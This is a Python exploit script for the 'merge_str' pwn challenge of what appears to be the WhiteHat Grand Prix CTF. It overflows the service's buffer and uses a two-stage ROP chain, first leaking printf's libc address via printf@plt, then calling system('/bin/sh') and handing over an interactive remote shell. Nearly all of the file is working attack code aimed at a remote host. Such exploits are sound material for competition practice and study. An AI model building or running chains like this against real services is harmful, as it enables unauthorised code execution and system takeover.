from Pwn import *
# Target: the WhiteHat Grand Prix "merge_str" pwn service.  ``elf`` is the local
# copy of the binary (presumably the source of the PLT/GOT addresses the exploit
# reads later); host/port is the remote instance the exploit connects to.
_TARGET = {
    'elf': './merge_str',
    'host': 'bakpwn06.grandprix.whitehatvn.com',
    'port': 23506,
}
p = Pwn(**_TARGET)
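# ROP gadgets taken from the (non-PIE) merge_str binary.
_POP_EBP_RET = 0x08048b06   # pop ebp; ret -- discards the one argument of the call before it
_MAIN = 0x08048C7F          # main(); returning here lets us drive the service a second time

# Padding needed to reach the saved return address from the overflowed buffer.
_PAD = 'A' * 28


def _overflow(chain):
    """Drive the service to the vulnerable copy and send ``_PAD + chain``.

    The prompts answered here (two 50-byte strings, confirm with 'Y', index
    184, then the string) are the interaction that reaches the overflow in
    the original exploit; ``chain`` is the packed ROP chain that lands on the
    saved return address.
    """
    p.read_until(':')
    p.sendline('A' * 50)
    p.read_until(':')
    p.sendline('B' * 50)
    p.read_until('(Y/N)')
    p.sendline('Y')
    p.read_until('Index :')
    p.sendint(184)
    p.read_until('String:')
    p.sendline(_PAD + chain)


def exploit():
    """Two-stage ret2plt / ret2libc attack on the remote ``merge_str`` service.

    Stage 1 overflows the buffer with a chain that calls ``printf@plt`` on
    ``printf@got`` to leak printf's runtime address and then returns to
    ``main``.  From the leak the libc base-relative addresses of ``system``
    and ``"/bin/sh"`` are computed with the helper's offset table.  Stage 2
    reuses the same overflow to call ``system("/bin/sh")`` and then hands the
    connection to the user via ``p.io()``.

    Raises:
        RuntimeError: if the leaked printf address cannot be located in the
            service output, i.e. the stage-1 chain did not fire as expected.
    """
    p.connect()

    # Stage 1: printf(printf@got) leaks 4 bytes of libc, then back to main.
    _overflow(p.pA(
        p.plt['printf'],
        _POP_EBP_RET,
        p.got['printf'],
        _MAIN,
    ))
    out = p.read_until('=MERGE=MESSAGE')

    # The leak is located heuristically: the first 0xb7 byte in the output is
    # taken to be the high byte of a little-endian 32-bit libc address
    # (0xb7xxxxxx).  A stray 0xb7 earlier in the output, or a libc mapped
    # elsewhere, would mis-parse the leak, so fail loudly rather than let an
    # empty slice reach unpack().
    idx = out.find('\xb7')
    if idx < 3:
        raise RuntimeError('printf leak not found in service output: %r' % out)
    printf = p.unpack(out[idx - 3:idx + 1])

    # get_libc_offset(addr, sym) with no target symbol appears to default to
    # system; the three-argument form resolves the "/bin/sh" string.
    system = printf - p.get_libc_offset(printf, 'printf')
    bin_sh = printf - p.get_libc_offset(printf, 'printf', '/bin/sh')
    print(hex(printf))
    print(hex(system))
    print(hex(bin_sh))

    # Stage 2: system("/bin/sh"), then back to main so the connection stays up.
    _overflow(p.pA(
        system,
        _POP_EBP_RET,
        bin_sh,
        _MAIN,
    ))
    p.io()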
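# Only fire the exploit when run as a script, not when imported for its helpers.
if __name__ == '__main__':
    exploit()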